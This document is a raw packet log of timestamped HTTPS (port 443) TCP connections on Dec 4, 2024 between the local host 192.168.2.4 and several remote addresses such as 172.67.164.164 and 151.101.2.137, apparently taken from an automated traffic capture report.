                                                                                                                              Dec 4, 2024 21:15:57.221630096 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.221863031 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.221868992 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.222313881 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.222472906 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.222487926 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.223368883 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.223422050 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.224140882 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.224194050 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.263422966 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.274076939 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.274082899 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.320266962 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.870769978 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.870874882 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.870918036 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.870950937 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.870973110 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.870979071 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.870997906 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.871011019 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.871041059 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.871047020 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.880733013 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.880872011 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.880880117 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.900036097 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.900075912 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.900085926 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:57.944681883 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:57.990721941 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.041522026 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:58.072604895 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.076653957 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.076811075 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:58.076821089 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.084676027 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.084724903 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:58.084729910 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.084794998 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.084841013 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:58.085356951 CET49745443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:15:58.085371971 CET44349745172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.274682045 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:58.274708033 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.274887085 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:58.274976015 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:58.274990082 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.291982889 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:58.292026043 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.292186022 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:58.292263031 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:58.292274952 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.293242931 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:58.293251038 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.293298960 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:58.293523073 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:58.293528080 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.502408028 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.502809048 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.502854109 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.503781080 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.503854990 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.504439116 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.504508972 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.504718065 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.504725933 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.509588957 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.509869099 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.509876966 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.510889053 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.510948896 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.511904001 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.511964083 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.512119055 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.543987989 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.555331945 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.559356928 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.559364080 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.600630999 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.680803061 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.685688019 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:59.685700893 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.686750889 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.686811924 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:59.688613892 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:59.688678980 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.689191103 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:59.689198971 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.742177963 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:15:59.977905035 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.977972984 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.978027105 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:15:59.984427929 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984476089 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984512091 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984536886 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.984549999 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984594107 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.984595060 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984607935 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.984653950 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.984659910 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.994298935 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:59.994354963 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:15:59.994366884 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.002795935 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.002875090 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.002882957 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.049263954 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.055690050 CET49750443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:00.055707932 CET44349750104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.061176062 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:00.061206102 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.061270952 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:00.064357042 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:00.064372063 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.105214119 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.114433050 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.114952087 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.114994049 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.115005970 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.123265982 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.123325109 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.123337984 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.131702900 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.131750107 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.131757021 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.140070915 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.140115976 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.140122890 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.148607969 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.148654938 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.148660898 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.158715010 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.158729076 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.180005074 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.180125952 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.180145025 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.188940048 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.189076900 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.189085960 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.196361065 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.196440935 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.196448088 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.197688103 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.203886032 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.203936100 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.203943968 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.211297989 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.211368084 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.211375952 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.219012022 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.219125032 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.219131947 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.226252079 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.226324081 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.226331949 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.233675957 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.233779907 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.233788013 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.241202116 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.241324902 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.241332054 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.241476059 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.255943060 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.256005049 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.256105900 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.256117105 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.256243944 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.263248920 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.270642042 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.270684004 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.270782948 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.270864010 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.270925045 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.271166086 CET49749443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.271183968 CET44349749104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.275322914 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.275348902 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.275420904 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.275638103 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:00.275649071 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.288736105 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.288743973 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.306900978 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.307159901 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.307168007 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.311130047 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.311217070 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.311223984 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.322196960 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.322252989 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.322261095 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.330167055 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.330295086 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.330302000 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.338293076 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.338344097 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.338351011 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.354403973 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.354465008 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.354471922 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.354480982 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.354543924 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.362442017 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.370522022 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.370593071 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.370599985 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.378595114 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.378674030 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.378679991 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.386771917 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.386843920 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.386852026 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.393080950 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.393155098 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.393162012 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.399347067 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.399414062 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.399420977 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.419209957 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.419279099 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.419286013 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.459961891 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.498938084 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.504466057 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.504511118 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.504518986 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.510783911 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.510828972 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.510835886 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.517657995 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.517704964 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.517712116 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548051119 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548059940 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548083067 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548095942 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548109055 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.548120022 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548126936 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.548147917 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.548166990 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.564306974 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.564313889 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.564341068 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.564368963 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.564379930 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.564393044 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.564441919 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.564826012 CET49748443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.564835072 CET44349748151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.795248985 CET49753443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.795294046 CET44349753151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.795406103 CET49753443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.795629978 CET49753443192.168.2.4151.101.2.137
                                                                                                                              Dec 4, 2024 21:16:00.795644999 CET44349753151.101.2.137192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.293015003 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.293427944 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.293447018 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.293908119 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.294255972 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.294320107 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.294389009 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.339339972 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.493952990 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.494221926 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:01.494242907 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.494525909 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.494827032 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:01.494877100 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.494956017 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:01.539330959 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.775886059 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.775933981 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.775964022 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.775981903 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.776000977 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.776041985 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.776045084 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.776058912 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.776103020 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.784256935 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.792802095 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.792845964 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.792854071 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.801213026 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.801261902 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.801269054 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.852861881 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.895699978 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.946604013 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.946620941 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.971612930 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.971658945 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.971679926 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.977906942 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.977931976 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.977950096 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.977960110 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.977994919 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.985826015 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.993657112 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.993700981 CET49751443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:01.993710041 CET44349751104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.994128942 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.994184971 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.994216919 CET44349752104.17.25.14192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.994225025 CET49752443192.168.2.4104.17.25.14
                                                                                                                              Dec 4, 2024 21:16:01.994237900 CET44349752104.17.25.14192.168.2.4
